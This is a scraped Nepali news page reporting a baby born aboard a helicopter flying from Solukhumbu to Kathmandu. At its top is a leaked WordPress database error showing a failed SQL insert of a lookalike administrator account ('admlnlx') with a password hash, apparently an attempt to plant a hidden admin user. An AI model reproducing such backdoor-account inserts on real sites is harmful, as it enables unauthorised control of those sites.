WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B5y24IDi2XpWm8A8Y3ud1B2uydMXTw.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 06:04:49', '', 'admlnlx', 'admlnlx')

सोलुखुम्बुबाट काठमाण्डौ उडेको हेलिकोप्टरमै जन्मियो शिशु – Gaule Khabar

सोलुखुम्बुबाट काठमाण्डौ उडेको हेलिकोप्टरमै जन्मियो शिशु

सोलुखुम्बुबाट काठमाण्डौ उडेको हेलिकोप्टरमै जन्मियो शिशु

गाउँले न्यूज, २१ माघ, काठमाडौं । सोलुखुम्बुबाट काठमाडौं उडेको हेलिकप्टरमा एक शिशुको जन्म भएको छ । गर्भवति महिला लिएर काठमाडौं आउँदै गर्दा आकाशमै एक शिशुको जन्म भएको हो ।

विहान सोलुको नुन्थलाबाट उडेको कैशाल हेलिकोप्टरमा काठमाडौं आउँदै गरेकी कञ्चन तामाङकी श्रीमती नोर्साङ डोल्मा शेर्पाले छोरा जन्माएकी हुन् ।

कैलाश हेलिकोप्टरका अपरेसन इन्चार्ज श्रीहरि कुइँकेलका अनुसार भक्तपुर आसपास अँइपुगेपछि शिशुको जन्म भएको हो । आमा र बच्चा दुबैलाई हाल भक्तपुर अस्पतालमा राखिएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका